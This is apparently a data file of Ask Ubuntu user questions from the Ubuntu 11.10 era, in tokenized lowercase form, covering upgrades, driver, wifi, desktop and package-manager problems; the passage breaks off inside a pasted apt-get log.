65661	i was told on launchpad to test a mainline kernel . how do i do that ( with nvidia drivers ) ?	i am coming from bug # 868950 on launchpad , a kernel related problem . to analyse the problem a bit deeper and see where it comes from , i was told to try out a mainline kernel to see if the problem persists . it would be great if the person to answer this question could post a step-by-step guide on what to do . it would also be nice to explain why this is required and how exactly this helps the developers . i could n't find any proper documentation on this for newbies . i 'm sure this way more people will find themselves able to help out and we 'll eventually do the devs a favor . note that i have to use nvidia drivers .
65667	how can i move the ubuntu one folder to another partition on windows ?	today i 've installed the current release of ubuntuone to my windows 7 desktop , but the installer does n't allow me to create the ubuntuone-folder outside my profile-directory ( c : \users\me ) . the problem is , that i do n't host any personal data on the windows partition . all my data stored on an extra partition ( d : ) . so i want that the ubuntuone folder is also on that partition . is there any way to sync d : \ubuntuone ? best regards stefan
65669	nas device for ubuntu	fellows , i would like to know if you use , how you use and which device as network attached storage . i 've being reading some reviews online , and there is a lot off downsides in many models - more recently , the ones from iocell . some of then need special software to be accessed , some of then are too warm , and so on . there is any one quite famous for linux users ? i was expecting to connect one of those things in my wireless router ( with cable ) and , and when it get on it would be mounted like a pendrive in the network ... i really have no idea : ( thanks ! pedro
65671	why does n't canonical have a store in india ?	i 'm desperate to buy some of those great things up for sale on the canonical store . is there anything that is being done to bring the store to india or have some kind of a retailer to sell the merchandise here . at the moment the shipping costs to india is really very high and additionally we may also have to pay up customs for the product purchased .
65673	is there an actively maintained truecrypt repository	the last time i installed truecrypt ( on debian ) i built the package myself . i 'm now on ubuntu 11.04 and i 'd rather not do that again . the only download they have on their site is a tarball , but i prefer to install from a package than manually where possible . is there an actively maintained ppa or repository somewhere with truecrypt for ubuntu 11.04 , or even just built packages available to download ? ( i realise it 's kept out of ubuntu and launchpad because of licensing issues , but that does n't mean there is n't another repo elsewhere ... )
65674	can i install amd catalyst 11.9 ?	i got a problem i ca n't figure out how to fix . i got 11.10 oneiric ( amd 64 ) on a lenovo s205 with amd e-450 , ati hd 6320 graphics and amd catalyst 11.8 driver . the perfomance is not terrible but worse than the standard driver ubuntu boots with before the proprietary ati driver are installed . when dragging windows over the desktop they do n't move smooth and wacthing videos in totem movie player i get black frames every 3-4 seconds . also i got a `` amd unsupported hardware '' water mark in my lower right corner of my desktop the hole time . in ubuntu `` system info '' in ubuntu system setting it repports graphics driver to be `` vesa : wrestler '' i tried the `` ati/amd proprietary fglrx graphics driver ( post-release updates ) '' but it ca n't install . the 11.9 driver from amd installes but does not work with unity , the launcher are missing . if i remove the ati/amd proprietary fglrx graphics driver , unity launcher are again missing when restarting . will installing this driver work with unity and make playback smooth like win 7 ?
65676	can not open files since workspaces act weird	yesterday , i began having difficulties opening files , both when trying to upload things to the internet and when trying to open files in for instance libreoffice . instead of the popup window which asks what file to open ( which showed in the activity bar , but were n't visible on the screen ) , on the workspaces symbol , there would light up half a workspace . it looks like something covers 1,5 workspace . when i try to go to workspace 2 , half of workspace 1 is visible , and the rest of the screen is disturbed . i have tried rebooting , turning off the computer completely , getting rid of libreoffice and then re-installing it again , and opening several different files . nothing makes the problem go away . sometimes the graphics become weird ( one version on top of another repeated times ) , and sometimes nothing happens for a very long time , except a random scroll down bar appear at a random place . i have tried to take screenshots of some of the problems , to cover most of the problems , so there 's nothing wrong with the underlying processor , but there seems to be something wrong with the graphics . any help is greatly appreciated .
65679	is it possible to switch between headphones and speakers ?	is it possible to switch between headphones and speakers by software control ? i 'm disabled , and plugging and unplugging my headphones is rather difficult for me . i 'd rather just press a button and find sound output switched to another output device , is this possible ?
65681	always a 'network error ' on mobile in ubuntu one music	i 'm using ubuntu one in android 2.3 . i have always a `` a network error occured . try again later '' when i try to retrieve the list of music files on cloud ( the demo goes well ) . my network connection is ok ( wi-fi and 3g ) . is this some server problem or something that i can resolve ? specs : android 2.3.3 on lg-p500h ubuntu one music , version 1.5
65682	how do i establish an ftp connection from windows to ubuntu server ?	i have a lamp web-server on ubuntu 11.10 , working perfectly . but now i want to develop my website from a windows 7 system in the same network . i want to set up an ftp connection to ubuntu so i can put files in directories of my web-server . but when i try to connect with filezilla , it fails . what am i doing wrong ? do i need to install something extra with the lamp configuration ?
65683	looking for console program to generate tones	i 've been googling for a while now and i ca n't find what i am looking for . i 'm in the need of a console program that can play notes . example : play c c d d e e
65684	what kernel version does ubuntu server 10.04.3 lts come with ?	i want to know if a proposed hardware build will support a particular hardware raid controller . to be safe i want to grep the kernel source for product version codes . i 'm planning on installing ubuntu server 10.04.3 lts but ca n't seem to figure out what kernel version it comes with . i do n't have hardware yet ( or a pc even ) so installing it just to see is not an option . does anyone know please ?
65687	can i make ubuntu graphics equivelant to windows 7 with a hd 3000 chip ?	every time i run ubuntu on my thinkpad the visual appearance of the system , desktop and applications does not look very crisp and the colors do n't stand out . when i load windows 7 , graphics are much nicer , crisp , and colors pop . can i make ubuntu have the same equivalent visual graphics that windows 7 displays ? or because this is linux the graphics are not as good for the intel hd 3000 chip on ubuntu ? the best way i can describe the difference is on windows 7 there is no `` blur '' on the desktop icons , menus , menu icons , and pictures , text , menus , really pop . on ubuntu everything looks more dull and not `` high def '' fwiw , i installed 11.10 beta 2 .
65691	where have the font settings gone in 11.10/oneiric ocelot ?	since the shake-up of all the settings screens , how on earth does one edit their font settings ? particularly the rendering/aliasing/hinting options .
65692	remove aptitude 's `` press enter to continue '' after installations	whenever i install/update with the curses interface of aptitude , it keeps the log window open and asks you to press enter . can i just let aptitude skip this and return to the main screen if nothing went wrong ?
65703	auto convert odt to pdf	i am creating a few documents in libre office and i have to always send them as .pdf . but each and every time i forget to export it as pdf , so is there any way to auto convert the .odt document into pdf every time i save the document ? i have only about 4 docs , i keep making changes on them , so each and every time i make a change and save the odt i need that change to be updated in the corresponding pdf file . ps : i understand that unoconv can be used to convert via command line but is there a way to automatically do it ? another ps : i found out that there is something called inotify and inotify-tools and that can be used to trigger events when a file changes . but i have no idea on how to use it .
65704	how do i install ubuntu on an android tablet ?	i was trying to install ubuntu on an arm based android tablet . i figured that most of the solutions are running virtually . how do i install ubuntu natively on arm tablet , instead run it as a virtual image ?
65705	how to remove global menu from gnome shell ?	maybe asking my question in this way was incorrect . when i switch into gnome session and use a theme that have a transparent dock , in top left of screen there is global-menu for nautilus . i edited one custom theme and change # panel height to a short height , i can use global-menu . maybe it 's a simple bug in 11.10 beta2 release , but how can i remove this ?
65707	how to upgrade from 10.04 to 11.10	i just tried 11.10 on virtualbox and it seems to be fine . rather than making another partition , transfering files , and then deleting 10.04 to make sure everything 's all right , i would like to just upgrade to 11.10 . is it possible ?
65710	how to automatically trust our own ssl certificate in all browsers ?	i have created my own certificate and installed the thawte trial certificate as well.i got 'intermediate ca ' & 'test ca root certificate ' for installation through email.but i dont know , how to install these certificates.and i want my certificate to automatically trusted in all browser.please help me .
65711	can i download the upgrade from 11.04 to 11.10 without installing it right away ?	when it comes to regular day-today updates , i chose to download all updates in the background , and than i 'll manually choose to install it . especially now that 11.10 was just released and it will probably take a while to download , can i do the same with the upgrade from 11.04 to 11.10 ? so it will download everything in the background and once it 'll finish the download , i will be able to apply the upgrade when i want to ? can i download the complete release ( as if i 'm going to do a fresh install ) and use that in some way ?
65712	can i upgrade ubuntu-desktop from 11.04 to 11.10 using nx ?	is it possible to do the upgrade while not being infront of the computer , but rather connecting to it via the internet using nx ( from nomachine ) ? will the upgrade process include questions/prompts when the computer is disconnected from the internet ? the relevant computer is : an ubuntu-only boot ( meaning , there 's only one operating system and that 's ubuntu 11.04 ) connected using a wired network , so wireless will be disconnected when logged out set to return to its last state upon power failure using the nomachine nx server ( same for the client on my macbook )
65715	is the ubuntu direct download exactly the same as the torrent ?	is the default download of ubuntu-11.10-desktop-i386.iso identical to the torrent ubuntu-11.10-desktop-i386.iso.torrent ? i 'm asking because am finding the direct download 25 % faster , but would be happy to seed back to people if i can simply place that file over my only slightly started torrent and then verify the data ?
65718	file lens does n't display any files until after opening it the first time	i 'm running the final , 64-bit version of 11.10 on my sony vaio and the files lens , when first clicked , does not display any files . only after about five minutes when i check back after opening it the first time does it work . i do not have this problem on the 32-bit version of 11.10 on my netbook . any ideas what i should do ?
65719	software centre & language update not working	i installed oneiric , and the software center installs and language updates are not working ! it says : the action would require the installation of packages from not authenticated sources . irefox-locale-sl hyphen-sl language-pack-gnome-sl language-pack-gnome-sl-base language-pack-sl language-pack-sl-base libreoffice-help-sl libreoffice-l10n-common libreoffice-l10n-sl myspell-sl thunderbird-locale-sl then , when installing chromium : failed to download package files check your internet connection but internet works ( otherwise i could n't write this post ) . thank you !
65721	window-title freezes when using compiz	i have recently enabled compiz on ubuntu 11.04 , everything works well except an annoying problem ! the windows title does n't change , imagine you have many open tabs in firefox and when you change tabs it does n't change ! its for very where ( like natilus , text editor & .. ) but if you resize that window , it changes the title ! mean it changes the window title if you resize the window . tool-bar title is ok and changes normaly .
65725	unity on a non-widescreen monitor	since the launchpad in unity ( or what the bar on the left is called ) ca n't be moved into another position , i wanted to ask you guys how use-able unity is on a monitor with a maximum screen resolution of 1280x1024 . due to the fact that it 's designed for widescreen monitors . thanks !
65726	why does my wifi not work ?	yesterday evening , my connection was working perfectly well . then i connected to my school 's wifi this morning , fine . as i was switching it on , my friend pressed my wifi button . i shut down my computer , 3 minutes later , i switched my laptop on again , it showed 'wireless disabled by hardware switch ' . i tried to press it in different ways , like 5 seconds or double . all i could do is switch the bluetooth on and off . some times the 'by hardware switch ' disappears leaving the disabled behind . i 'm using ubuntu 11.04 , a single os in compaq presario cq60 104tu . please help me with this , i have no idea what it is . i searched all over the cyber world but i did n't find anything that helped me.i only had it working fine for a night please reply .
65727	unity not searching applications	i installed ubuntu 10.10 and have updated to 11.04 and now 11.10 . i switched from using ubuntu classic / gnome classic to unity for this release . the problem is , the super key menu ( dash ) , does n't seem to search applications . i 'm trying to look for google chrome and no matter what i search , it only searches for files . it does n't seem to matter what lens i use either , such as by clicking `` internet apps '' or `` media apps '' . what can i do to fix this ? edit : ubuntu software centre seems to fail when i search for any application as well !
65728	where to install software and executables for all users	by default some applications install into /usr/local/bin , but if i change users will that user be able to access this application ? i read somewhere here ( another question ) that i should use /opt ? but binaries that by default goes into /usr/local/bin ? theres no /opt/bin ?
65729	application for creating images that look hand written/hand drawn	my wife recently installed the snapseed application on her ipad , and i really like how the help screens for each of the functions snapseed offers comes across as being hand written/hand drawn . see an example : short of actually hand writing and/or hand drawing stuff and scanning it in , does anyone know of an application that would provide me with the ability to create similar images for using in presentations and such ? i 'm by no means an artist , and my hand writing sucks , so scanning stuff in is out of the question . : - )
65730	can not mount sd card on ubuntu server	i 've a problem . i run ubuntu server on usb . and during installation i also used sd card as a swap space . but the problem is that it 's not being mounted at all . if i check df i only see usb key - no sign of swap space , or another partition on it . any ideas how to get to that partition ? p.s . even under /media/ i can not find it . p.p.s . using mount command does n't help either
65732	why does ubuntu one ask you to install couchdb for thunderbird ?	why does ubuntu one ask you to install couchdb for thunderbird , especially if you still are unable to sync your contacts with thunderbird ? when can we finally get support for one of the top most used email clients in ubuntu one ?
65736	touchpad not working on dell xps l501x	i just installed ubuntu 11.10 ( 64 bit ) and my touchpad is dead . some ideas ?
65738	theme displays icons over some fields	i 'm using ubuntu server 10.04 , and i work using ssh x11 redirect . i 've installed ambiance themes in it , but now i have some weird behavior in some components : seems like some icons over the fields . how can i fix this ?
65740	upgrading my wubi 11.04 to 11.10	i want to upgrade my current wubi installation ( ubuntu 11.04 ) to ubuntu 11.10 . is this possible to do inside wubi ? or do i have delete wubi from windows , therefore deleting my current ubuntu installation ; and then install 11.10 via the wubi installer ? thanks
65741	replacing 11.10 gnome power manager with 11.04 or xfce power manager	i am not too keen on the new 11.10 power manager control - there are less options i can tweak . does anyone know how to replace the 11.10 gnome power manager/control with the one that comes with 11.04 or even with xfce power manager ? many thanks for any help .
65744	i need to add sections in xorg.conf , do i need to create it ?	i understand that 10.10 / kms does not use xorg.conf ; however , i need to add the following to my xorg.conf in a device section : option `` capabilities '' `` 0x00000800 '' option `` usefasttls '' `` off '' option `` kernelmoduleparm '' `` locked-userpages=0 '' however , /etc/x11/xorg.conf does not exist ... do i have to recreate one , or do i have to add this to a file inside of /usr/share/x11/xorg.conf.d/ ?
65751	how do i remove the battery icon from top bar ?	i just discovered ubuntu a few days ago and now upgraded to 11.10 . for the battery , i do n't need it at all . i have no reason to give and does not want people to tell me `` that 's usefull '' , i think we should be able to remove it easily . thank a lot for your help .
65753	login screen does n't remember my choice of desktop enviroment	i have installed gnome shell , loged in to it , but on boot the computer logs in to a ubuntu session . i have automatic log in enabled . how can i fix this . how can i make ubuntu remember my choice of desktop enviroment .
65754	does usb creator support dvd isos ?	i 'm trying to make a bootable flash drive using usb-creator . my iso file is a dvd iso . when i choose the iso it does n't appear on the source list . no error , just nothing happens . on the file type option , there 's only `` disk images '' and `` cd images '' but there 's no `` dvd images '' so i think dvd iso is not supported . is that true ?
65755	unable to load lucid partner packages from archive.canonical.com	i 'm trying to load packages from the archive.canonical.com lucid partner repository , and am getting : w : gpg error : http : //archive.canonical.com lucid release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > whenever i do apt-get update . this happened right after the ubuntu 11.10 release this morning . it looks like the release file got updated , but the release.gpg did not in http : //archive.canonical.com/ubuntu/dists/lucid/ does anyone have ideas ?
65758	`` apt-get update '' gpg error	when i run : apt-get update i get this error : '' w : gpg error : http : //archive.canonical.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key ``
65759	how do i set the background color/pattern in a nautilus window ?	in previous versions of ubuntu , i used to go under the edit menu to set the background color of a nautilus window . i have no idea how to do this in ubuntu .
65760	how to fix an `` expired timestamp '' error ?	i have installed and reinstalled ubuntu one on my windows7 64bit system and i always get a `` expired time stamp '' error . what can i do ? the error also when clicking on the links in the sync-panel ( for example `` edit your service online ) . the error than is display in the browser : expired time stamp : given 1318613351 and now 1318526904 has a greater difference than threshold 900
65761	how can i adjust the cursor size or reset it to the default value ?	i do n't know why , but after installing ubuntu 11.10 the cursors are very large . not always but almost in all applications ( see the screenshot below . ) how can i adjust the cursor size or reset it to the default value ?
65763	unity fails to load with nvidia-current with a nvidia geforce gt 520m	i am using nvidia geforce gt 520m default nvidia-current can only boot into unity 2d , unity fails to load . i tried proprietary version ( 285 ) and it ca n't get into lightdm at all until i removed xorg.conf , even after that i can only get into unity 2d as well . finally i tried the ubuntu-x-swat ppa and still , logging in with unity only defaults back to unity 2d . with all 3 drivers running the /unity_support_test -p command gets me xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : unable to create the opengl context what can i do to get regular unity running ?
65764	how do i toggle sound with amixer ?	including natty i was always able to toggle ( mute/unmute ) the 'master ' sound volume with the amixer sset master toggle command that i linked to an edge binding in compizconfig-manager . now after installing oneiric the command only mutes the sound but does n't unmute it . i even tried it in the terminal but it also does n't work . it changes 'mono : playback 68 [ 78 % ] [ -14.25db ] [ off ] ' to ' ... [ on ] ' but the sound stays muted so that i have to unmute it via the 'sound-indicator ' in the panel . how can i get this working again ? what did change since natty ? does anyone know the command the 'sound-indicator ' uses to toggle the sound volume ?
65765	does 11.10 support sandy bridge ?	i 'm an user of ubuntu 11.10 who have an asus u32sd equipped with i5 sandy bridge ( intel graphics integrated ) . i 'm afraid that the support of this plattform in ubuntu is quite bad , and the functionality of the system is lower in comparison with other systems non open source . i 'd have the hope that oneiric ocelot would increase this performance , but i 'm afraid not . i 'm wrong ? i mean , there is any possibility to make sandy bridge works better ? thanks a lot edit : thank you very much for your answers , but i 'm afraid that my experience is worse than yours . i do n't talk about nothing but my own use of ubuntu and sandy bridge , especially about graphics . i 've installed 11.10 and there are not any 3d effects , and when i try to install gnome-shell , results are even worse , because it loads automatically gnome-fallback mode . the tests say that there are opengl errors and i can not activate even the application switcher of ubuntu . these are the reasons of my question above . have any idea about what would be the problem ? the computer is also equip with nvidia optimus , but the intel graphics have to work , have n't it ? thanks , thanks , thanks
65767	how do i stop empathy from adding an icon in the panel ?	empathy displays a menu in the `` system tray '' or unity top panel . so in addition to having new messages show up in the message menu , i also have this big ugly green talk bubble pop up . how can i get that to stop , so that it 's just the message menu that i have to look at ? this is on 11.10 , by the way .
65770	how to remove the big banner from software center ?	in the new version of ubuntu software center there is a big banner under toolbar . it 's useless for me . how do i remove it ?
65771	/dev/mapper/cryptsetup1 is not ready yet or not present , slow system	today i had a very high system load because i used many applications at the same time ( virtualbox , totem , firefox , ... ) . the load was so high , that the system almost did n't react anymore . then i killed virtualbox and the system became a bit faster , however it was terrible slow compared to the usual behaviour though i killed all large applications . after a reboot i got the message : /dev/mapper/cryptsetup1 is not ready yet or not present , slow system however the system works but very very slow . i tried to disable and reenable encrypted swap as described here : http : //www.logilab.org/29155 now the error message is missing but the system is still very very slow . any idea how to fix this ?
65779	how do i get an atheros ar9285 wireless card working ?	hi i have a sony laptop with sandy bridge chipset . i installed the new version of ubuntu 11.10 because of i read that this release should have support for this chipset . in fact , almost all devices of my laptop are working fine , but the wireless card can not be enable . i found several links to older versions , but i guess all of them were design to work with kernels 2.x.x so i did not tried them . is there any way to repair this at this time ? *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 90:00:4e : c7:44:15 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.0.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : d2500000-d250ffff *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : c0 serial : 78:84:3c:96 : cd : a0 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.1.67 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:43 memory : d1400000-d143ffff ioport:2000 ( size=128 ) ana @ freud : ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : sony-wifi : wireless lan soft blocked : no hard blocked : no 2 : sony-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : hci0 : bluetooth soft blocked : yes hard blocked : no 4 : acer-wireless : wireless lan soft blocked : yes hard blocked : no
65780	gnome 3 after run has graphic problems	i have 3d accelarator but gnome still does n't work my pc enters gnome desktop bu there i have graphic problems ! graphic problems with the top taskbar and wherever i click it , my desktop transforms into gnome clasic desktop . i am using ati radeon 4800 hd and ubuntu 11.10 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes similar report from @ user26930 - ati hd5770 graphics card - gnome-shell is affected but unity works fine .
65784	how can i send pulseaudio streams over to another computer ?	i upgraded to oneiric today and found out that i ca n't send my pa stream over to my desktop anymore . the same program that i used in natty and before , papfrefs , is still there , but everything in the program is greyed out . how can i 'enable ' this functionality again ?
65787	how do you save the brightness settings ?	it becomes quite annoying to lower brightness each time i boot up my system so , i 've been searching how to save current laptop screen brightness in ubuntu 11.10 for quite some time , sadly , without any luck . there 's no option in system settings > power for it nor in compizconfig-settings-manager . can someone point me to the right direction ?
65788	can i use fglrx if i disable my integrated graphics ?	first of all : i love the new ubuntu-release . sadly , i cant really use it . my laptop has a i5-cpu , which comes with integrated graphics . it seems like there is no way at the moment to change the gpu while x is running , but i 'm fine with that . basically , i just want 3d acceleration to play some games , but i cant get fglrx to install in any way . i tried the integrated tool for installing such drivers , but i also tried downloading them from the amd website . either way my desktop/x11 either gets screwed up or i do n't have any 3d acceleration whatsoever ( i tried different options with aticonfig ) . unfortunately my laptop does not have the option to disable the integrated gpu , so i cant test how the driver would react if there was only one card . so my question is : is there any way to get 3d-acceleration out of my laptop ? ( it might help to mention that vga_switcheroo is working to at least turn off the card im not currently using , but that does not enable 3d-graphics )
65789	what is the toolchain upload that happens at the start of every release cycle ?	looking at the release schedules , every release seems to start with a toolchain upload . what is a toolchain and which packages build the toolchain in ubuntu ?
65790	ubuntu desktop vs ubuntu server for development	i just installed ubuntu desktop 11.10 . i will be using it to work on lamp and java development . here is my doubts : i want to know which edition should i install ? is there any advantage using the server edition ? also , i do n't see apache , mysql etc ( but i see eclipse & other java development tools ) in the software center ? how can i get access to other packages ( apache , mysql , php etc ) other than going through downloading and installing from each site ? thanks in advance .
65792	skype not launching from menu but works from command line	when i launch skype from the launcher , it flashes then nothing happens . if i run it from command line it works . from command line i get these warnings however : skype:2018 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( skype:2018 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( skype:2018 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( skype:2018 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , anybody has the same issue and knows how to work around it ? thanks
65797	why wunderlist is n't available in the software center ?	i 've upgraded to ubuntu 11.10 and i tried to install wunderlist form the software center but it is n't avalaible like in natty , someone know why and how to solve ?
65801	reinstate window snapping feature after reverting to gnome classic	how do i get the window snapping feature working again after reverting to gnome classic on 11.10 like suggested in this answer to how to revert to gnome classic
65803	two battery indicator symbols , how do i get rid of one ?	after upgrading to 11.10 i have two battery indicator symbols . they look similar but show different tooltips . ( it 's german language - one only shows `` laptop-akku ist vollst채ndig aufgeladen '' ( laptop-akku fully loaded ) , the other offers a menu that can bring up the energy options . the second one seems to be the right one . the first one i want to get rid of , but do n't know which program this is .
65806	ca n't boot on a gigabyte ga-770-d3l motherboard	i have a gigabyte ga-770-d3l motherbaord and my first hdd is ssd ocz 120gbytes , i ca n't boot ubuntu ! not even tries to load it ! is my motherboard incompatible ? its very strange . i have set the boot order all right it does n't even get me to the grub when i install windows it 's booting normally . cd rom boots like a charm but hdd refuse to proceed to booting . i tried to disable the efi boot on bios ( its for windows 7 64bit ) but it made no difference .
65807	how to correctly disable auto-hide in unity 2d , ubuntu 11.10 ?	seems that my previous question is resurrected by the release of ubuntu 11.10 : ( . i have disabled unity2d autohide via gconf-editor as answered - but it is still auto hiding ! what i 'm doing wrong ?
65808	are gnome-shell-extensions available in the repositories ?	gnome-shell-extensions are very useful for those that like ubuntu but prefer using gnome desktop interface and not unity . but they are not currently available on ubuntu oneiric repositories .
65812	how do i force chromium 's window buttons to the right side when in gnome ?	i prefer gnome shell as a de . the migration from unity to gnome shell in 11.10 is flawless but there is an annoying bug with chromium . the buttons on chromium stay on the left side where gnome shell uses the right side . any ideas on how to force chromium have the buttons on the right side ? thanks .
65813	how can i use compiz `` screen edges '' ?	as of ubuntu 11.10 , i enabling `` screen '' edges in compiz ( i.e. , initiate scale when the mouse is moved to the top-left corner ) no longer works . is there any way to work around this ? the ability to use screen edges is integral to the way i use a desktop , and one of the main reasons i use ubuntu as my main os .
65819	why ca n't i install a ppa ?	hello i 'm trying to install a ppa , but the software center does n't read it . i try for hardware sensors idicator and for handbrake and they do n't appear in the all software tab so i can install them . plus my software center is acting all weird like if it was buggy , i liked the old one better , simple . i did what luis alvarado told me to do in the terminal and nothing . i copy and past it sudo add-apt-repository ppa : stebbins/handbrake-snapshots and then i updated with sudo apt-get update and still nothing for handbrake it does n't show up in the software center . ok everyone i got to install handbrake it works for some reason i had to restart my computer and there it was . thanks for the help . ok everyone i got to install the hardware sensors indicator . the problem was i forgot to install the lm-sensors package . i also install the sensor indicator through sypnaptic package manager . i follow this guy thanks for the help . http : //reformedmusings.wordpress.com/2011/10/15/panel-hardware-sensors-in-ubuntu-unity-for-oneiric-11-10/
65824	`` restoring previously installed packages '' never ends	i 'm upgrading ubuntu 11.04 to 11.10 via a liveusb . it has been `` restoring previously installed packages '' for about 1h 30 mins . is it normal to take so much time ? could i do something to improve speed ?
65827	random freezes , radeon mentioned in the console	i try to run ubuntu 11.10 . i tried : 64 bits release 32 bits release live cd ubuntu is freezing randomly ... i do n't know why . mouse is freezing , screen go black then appear again , mouse is moving but i ca n't do anything . note : freeze can append if i run firefox during install . 11.04 was perfect . i 've never had such troubles ... i 'm not a power user , just a fan ... so i ca n't bring you informations . i just have : a classic sata disk 1 primary partition with windows , 1 logical with ubuntu , 1 primary with personal data . usb mouse . ethernet cable . ati radeonhd card when i use ctrl+alt+f1 command , i have a lot of messages with errors . radeon is repeated a lot of times .
65828	how can i configure proxy authentication ?	the ubuntu 11.10 has only simple proxy configuration . where is the authentication option ? so it can be used to download packages ?
65829	how to watch tv with me tv ?	please help : me tv does n't start ( why ? ? ) and installing totem-plugins-dvb-daemon does n't show up in totem itself - so i ca n't watch tv with totem . i installed gnome-dvb-client as well as gnome-dvb-daemon . i can scan for channels via gnome-dvb-setup and even record streams with gnome-dvb-control ( and watch these streams later . ) i am looking for an easy to setup and easy to handle way for watching tv in ubuntu 11.10 oneiric . instead of unity i chose gnome-shell . i found a bug here : sudo add-apt-repository ppa : gnome-dvb-daemon/ppa sudo apt-get update sudo apt-get upgrade now i can activate the dvb-plugin in totem and watch tv . but i have no idea why me tv does n't start . i was used to use this program in previous ubuntu versions and would like to use it again .
65830	`` errno 5 - input/output error '' when trying to install	today i downloaded ubuntu for my laptop . it runs great from a bootable usb , but when i tried to install it , i 've got the `` errno 5 - input/output error '' . i tried everything to install it on my laptop , but nothing works ( also re-download the iso ) .
65831	upgrading from 11.04 to 11.10 ceased at certain point : how to continue ?	i upgraded my ubuntu 11.04 to 11.10 through update manager , but with 30 minutes to go ( out of 6 hours ) i got 3 error messages telling me that it could not install these packages : firmware-b43-installer flashplugin-downloader : i386 flashplugin-nstaller ( fyi : it 's a x64 laptop ) . so now i have a system which is not running very well ( read : slow ) . when trying to update again , i see a message that it can do a partially distro upgrade due to an unfinished previous one . i try it but immediately it tells me that the system is updated without doing anything . so now i can not get updates nether . is there a way to manually do the rest of the distro update , or should i burn an iso and do a fresh install ?
65832	`` no module named gnomeapplet `` error when trying to run battery indicator	i 'm trying to use battery-indicator on oneiric 64bit . i downloaded sources , run `` python setup.py install '' in terminal but every time i try to start it , i get this error : traceback ( most recent call last ) : file `` /usr/lib/battery-status/battery-status '' , line 40 , in < module > import gnomeapplet importerror : no module named gnomeapplet how can i make it work ?
65839	why wo n't my mouse and keyboard work in 11.10 ?	i am clearly not the only one dealing with this ... after upgrading to 10.10 my keyboard and mouse do n't work at the login screen . however , if i plug in another mouse to a random usb port , they somehow come to life and everything works as a charm . does anyone know what causes this to happen ? any feedback is highly appreciated .
65843	banshee no longer works after upgrade	i upgraded 11.04 to 11.10 using the online upgrade , and all went well except for banshee . it shows under the sounds icon in the panel , and the icon for the program shows in applications in the dash , but clicking on either one does nothing ( as does trying to run it from the terminal ) . there are no error messages or other indications that anything is wrong . i tried uninstalling it and then reinstalling , but i receive the message `` package dependencies can not be resolved '' . hmmm ... how would i fix that ? update : mdk @ savina : ~ $ sudo apt-get update & & sudo apt-get upgrade [ sudo ] password for mdk : ign http : //extras.ubuntu.com oneiric inrelease ign http : //archive.canonical.com oneiric inrelease ign http : //security.ubuntu.com oneiric-security inrelease hit http : //extras.ubuntu.com oneiric release.gpg hit http : //archive.canonical.com oneiric release.gpg hit http : //security.ubuntu.com oneiric-security release.gpg hit http : //extras.ubuntu.com oneiric release ign http : //us.archive.ubuntu.com oneiric inrelease ign http : //us.archive.ubuntu.com oneiric-updates inrelease hit http : //archive.canonical.com oneiric release hit http : //security.ubuntu.com oneiric-security release hit http : //extras.ubuntu.com oneiric/main sources hit http : //archive.canonical.com oneiric/partner sources hit http : //security.ubuntu.com oneiric-security/main sources hit http : //extras.ubuntu.com oneiric/main amd64 packages hit http : //extras.ubuntu.com oneiric/main i386 packages hit http : //us.archive.ubuntu.com oneiric release.gpg hit http : //security.ubuntu.com oneiric-security/restricted sources hit http : //security.ubuntu.com oneiric-security/universe sources hit http : //archive.canonical.com oneiric/partner amd64 packages hit http : //archive.canonical.com oneiric/partner i386 packages ign http : //archive.canonical.com oneiric/partner translationindex ign http : //extras.ubuntu.com oneiric/main translationindex hit http : //security.ubuntu.com oneiric-security/multiverse sources hit http : //security.ubuntu.com oneiric-security/main amd64 packages hit http : //security.ubuntu.com oneiric-security/restricted amd64 packages hit http : //security.ubuntu.com oneiric-security/universe amd64 packages hit http : //security.ubuntu.com oneiric-security/multiverse amd64 packages hit http : //security.ubuntu.com oneiric-security/main i386 packages hit http : //security.ubuntu.com oneiric-security/restricted i386 packages hit http : //security.ubuntu.com oneiric-security/universe i386 packages hit http : //security.ubuntu.com oneiric-security/multiverse i386 packages ign http : //security.ubuntu.com oneiric-security/main translationindex ign http : //security.ubuntu.com oneiric-security/multiverse translationindex ign http : //security.ubuntu.com oneiric-security/restricted translationindex ign http : //security.ubuntu.com oneiric-security/universe translationindex hit http : //us.archive.ubuntu.com oneiric-updates release.gpg hit http : //us.archive.ubuntu.com oneiric release hit http : //us.archive.ubuntu.com oneiric-updates release ign http : //extras.ubuntu.com oneiric/main translation-en_us ign http : //extras.ubuntu.com oneiric/main translation-en ign http : //archive.canonical.com oneiric/partner translation-en_us hit http : //us.archive.ubuntu.com oneiric/main sources hit http : //us.archive.ubuntu.com oneiric/restricted sources hit http : //us.archive.ubuntu.com oneiric/universe sources hit http : //us.archive.ubuntu.com oneiric/multiverse sources hit http : 